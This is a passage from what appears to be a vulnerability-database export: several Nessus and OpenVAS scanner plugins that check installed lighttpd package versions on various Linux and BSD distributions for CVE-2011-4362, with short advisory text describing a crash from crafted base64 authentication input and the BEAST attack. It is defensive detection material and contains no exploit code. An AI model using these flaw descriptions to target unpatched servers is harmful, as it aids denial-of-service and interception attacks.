script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif 
(!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-servers/lighttpd\", unaffected:make_list(\"ge 1.4.35\"), vulnerable:make_list(\"lt 1.4.35\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"lighttpd\");\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-03-17T23:03:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4362"], "description": "The remote host is missing an update announced via the referenced Security Advisory.", "modified": "2020-03-13T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120270", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120270", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2012-107)", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120270\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:22:01 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2012-107)\");\n script_tag(name:\"insight\", value:\"Integer signedness error in the base64_decode function in the HTTP authentication functionality (http_auth.c) in lighttpd 1.4 before 1.4.30 and 1.5 before SVN revision 2806 allows remote attackers to cause a denial of service (segmentation fault) via crafted base64 input that triggers an out-of-bounds read with a negative index.\");\n script_tag(name:\"solution\", value:\"Run yum update lighttpd to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2012-107.html\");\n script_cve_id(\"CVE-2011-4362\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = 
rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"lighttpd-fastcgi\", rpm:\"lighttpd-fastcgi~1.4.31~1.2.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"lighttpd-mod_mysql_vhost\", rpm:\"lighttpd-mod_mysql_vhost~1.4.31~1.2.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"lighttpd-debuginfo\", rpm:\"lighttpd-debuginfo~1.4.31~1.2.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"lighttpd-mod_geoip\", rpm:\"lighttpd-mod_geoip~1.4.31~1.2.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"lighttpd\", rpm:\"lighttpd~1.4.31~1.2.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:39:04", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4362"], "description": "The remote host is missing an update to the system\n as announced in the referenced advisory.", "modified": "2018-10-05T00:00:00", "published": "2012-02-13T00:00:00", "id": "OPENVAS:136141256231070584", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231070584", "type": "openvas", "title": "FreeBSD Ports: lighttpd", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: freebsd_lighttpd7.nasl 11762 2018-10-05 10:54:12Z cfischer $\n#\n# Auto generated from VID c6521b04-314b-11e1-9cf4-5404a67eef98\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.70584\");\n script_tag(name:\"creation_date\", value:\"2012-02-13 01:48:16 +0100 (Mon, 13 Feb 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-05 12:54:12 +0200 (Fri, 05 Oct 2018) $\");\n script_cve_id(\"CVE-2011-4362\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_version(\"$Revision: 11762 $\");\n script_name(\"FreeBSD Ports: lighttpd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsd\", \"ssh/login/freebsdrel\");\n\n script_tag(name:\"insight\", value:\"The following package is affected: lighttpd\n\nCVE-2011-4362\nInteger signedness error in the base64_decode function in the HTTP\nauthentication functionality (http_auth.c) in lighttpd 1.4 before\n1.4.30 and 1.5 before SVN revision 2806 allows remote attackers to\ncause a denial of service (segmentation fault) via crafted base64\ninput that triggers an out-of-bounds read with a negative index.\");\n\n script_tag(name:\"solution\", value:\"Update your system with the appropriate patches or\n software upgrades.\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update to the system\n as announced in the referenced advisory.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-bsd.inc\");\n\nvuln = FALSE;\ntxt = \"\";\n\nbver = portver(pkg:\"lighttpd\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.4.30\")<0) {\n txt += 'Package lighttpd version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\n\nif(vuln) {\n security_message(data:txt);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:39:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4362"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-06-28T00:00:00", "id": "OPENVAS:1361412562310864498", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864498", "type": "openvas", "title": "Fedora Update for lighttpd FEDORA-2012-9078", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for lighttpd FEDORA-2012-9078\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-June/082686.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864498\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-06-28 10:35:02 +0530 (Thu, 28 Jun 2012)\");\n script_cve_id(\"CVE-2011-4362\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name:\"FEDORA\", value:\"2012-9078\");\n script_name(\"Fedora Update for lighttpd FEDORA-2012-9078\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'lighttpd'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone 
Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n script_tag(name:\"affected\", value:\"lighttpd on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"lighttpd\", rpm:\"lighttpd~1.4.31~1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2018-01-06T13:06:42", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4362"], "description": "Check for the Version of lighttpd", "modified": "2018-01-05T00:00:00", "published": "2012-08-30T00:00:00", "id": "OPENVAS:864513", "href": "http://plugins.openvas.org/nasl.php?oid=864513", "type": "openvas", "title": "Fedora Update for lighttpd FEDORA-2012-9040", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for lighttpd FEDORA-2012-9040\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A 
PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"lighttpd on Fedora 17\";\ntag_insight = \"Secure, fast, compliant and very flexible web-server which has been optimized\n for high-performance environments. It has a very low memory footprint compared\n to other webservers and takes care of cpu-load. Its advanced feature-set\n (FastCGI, CGI, Auth, Output-Compression, URL-Rewriting and many more) make\n it the perfect webserver-software for every server that is suffering load\n problems.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-June/082765.html\");\n script_id(864513);\n script_version(\"$Revision: 8295 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-05 07:29:18 +0100 (Fri, 05 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-30 10:35:35 +0530 (Thu, 30 Aug 2012)\");\n script_cve_id(\"CVE-2011-4362\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"FEDORA\", value: \"2012-9040\");\n script_name(\"Fedora Update for lighttpd FEDORA-2012-9040\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of lighttpd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : 
\"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"lighttpd\", rpm:\"lighttpd~1.4.31~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-02T21:10:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4362"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2017-04-14T00:00:00", "published": "2012-02-13T00:00:00", "id": "OPENVAS:70584", "href": "http://plugins.openvas.org/nasl.php?oid=70584", "type": "openvas", "title": "FreeBSD Ports: lighttpd", "sourceData": "#\n#VID c6521b04-314b-11e1-9cf4-5404a67eef98\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID c6521b04-314b-11e1-9cf4-5404a67eef98\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: lighttpd\n\nCVE-2011-4362\nInteger signedness error in the base64_decode function in the HTTP\nauthentication functionality (http_auth.c) in lighttpd 1.4 before\n1.4.30 and 1.5 before SVN revision 2806 allows remote attackers to\ncause a denial of service (segmentation fault) via crafted base64\ninput that triggers an out-of-bounds read with a negative index.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(70584);\n script_tag(name:\"creation_date\", value:\"2012-02-13 01:48:16 +0100 (Mon, 13 Feb 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-14 11:02:12 +0200 (Fri, 14 Apr 2017) $\");\n script_cve_id(\"CVE-2011-4362\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_version(\"$Revision: 5956 $\");\n script_name(\"FreeBSD Ports: lighttpd\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"lighttpd\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.4.30\")<0) {\n txt += 'Package lighttpd version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-01-02T10:58:23", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4362"], "description": "Check for the Version of lighttpd", "modified": "2017-12-29T00:00:00", "published": "2012-06-28T00:00:00", "id": "OPENVAS:864498", "href": "http://plugins.openvas.org/nasl.php?oid=864498", "type": "openvas", "title": "Fedora Update for lighttpd FEDORA-2012-9078", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for lighttpd FEDORA-2012-9078\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY 
WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"lighttpd on Fedora 16\";\ntag_insight = \"Secure, fast, compliant and very flexible web-server which has been optimized\n for high-performance environments. It has a very low memory footprint compared\n to other webservers and takes care of cpu-load. Its advanced feature-set\n (FastCGI, CGI, Auth, Output-Compression, URL-Rewriting and many more) make\n it the perfect webserver-software for every server that is suffering load\n problems.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-June/082686.html\");\n script_id(864498);\n script_version(\"$Revision: 8257 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-29 07:29:46 +0100 (Fri, 29 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-06-28 10:35:02 +0530 (Thu, 28 Jun 2012)\");\n script_cve_id(\"CVE-2011-4362\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"FEDORA\", value: \"2012-9078\");\n script_name(\"Fedora Update for lighttpd FEDORA-2012-9078\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of lighttpd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n 
script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"lighttpd\", rpm:\"lighttpd~1.4.31~1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:50:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3389", "CVE-2011-4362"], "description": "The remote host is missing an update to lighttpd\nannounced via advisory DSA 2368-1.", "modified": "2017-07-07T00:00:00", "published": "2012-02-11T00:00:00", "id": "OPENVAS:70687", "href": "http://plugins.openvas.org/nasl.php?oid=70687", "type": "openvas", "title": "Debian Security Advisory DSA 2368-1 (lighttpd)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2368_1.nasl 6612 2017-07-07 12:08:03Z cfischer $\n# Description: Auto-generated from advisory DSA 2368-1 (lighttpd)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several vulnerabilities have been discovered in lighttpd, a small and fast\nwebserver with minimal memory footprint.\n\nCVE-2011-4362\n\nXi Wang discovered that the base64 decoding routine which is used to\ndecode user input during an HTTP authentication, suffers of a signedness\nissue when processing user input. As a result it is possible to force\nlighttpd to perform an out-of-bounds read which results in Denial of\nService conditions.\n\nCVE-2011-3389\n\nWhen using CBC ciphers on an SSL enabled virtual host to communicate with\ncertain client, a so called BEAST attack allows man-in-the-middle\nattackers to obtain plaintext HTTP traffic via a blockwise\nchosen-boundary attack (BCBA) on an HTTPS session. Technically this is\nno lighttpd vulnerability. However, lighttpd offers a workaround to\nmitigate this problem by providing a possibility to disable CBC ciphers.\n\nThis updates includes this option by default. 
System administrators\nare advised to read the NEWS file of this update (as this may break older\nclients).\n\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.4.19+lenny3.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.4.28-2+squeeze1.\n\nFor the testing distribution (squeeze), this problem will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.4.30-1.\n\n\nWe recommend that you upgrade your lighttpd packages.\";\ntag_summary = \"The remote host is missing an update to lighttpd\nannounced via advisory DSA 2368-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202368-1\";\n\nif(description)\n{\n script_id(70687);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_cve_id(\"CVE-2011-4362\", \"CVE-2011-3389\");\n script_version(\"$Revision: 6612 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:08:03 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-11 03:14:22 -0500 (Sat, 11 Feb 2012)\");\n script_name(\"Debian Security Advisory DSA 2368-1 (lighttpd)\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"lighttpd\", ver:\"1.4.19-5+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-doc\", ver:\"1.4.19-5+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-cml\", ver:\"1.4.19-5+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-magnet\", ver:\"1.4.19-5+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-mysql-vhost\", ver:\"1.4.19-5+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-trigger-b4-dl\", ver:\"1.4.19-5+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-webdav\", ver:\"1.4.19-5+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd\", ver:\"1.4.28-2+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-doc\", ver:\"1.4.28-2+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-cml\", ver:\"1.4.28-2+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-magnet\", ver:\"1.4.28-2+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = 
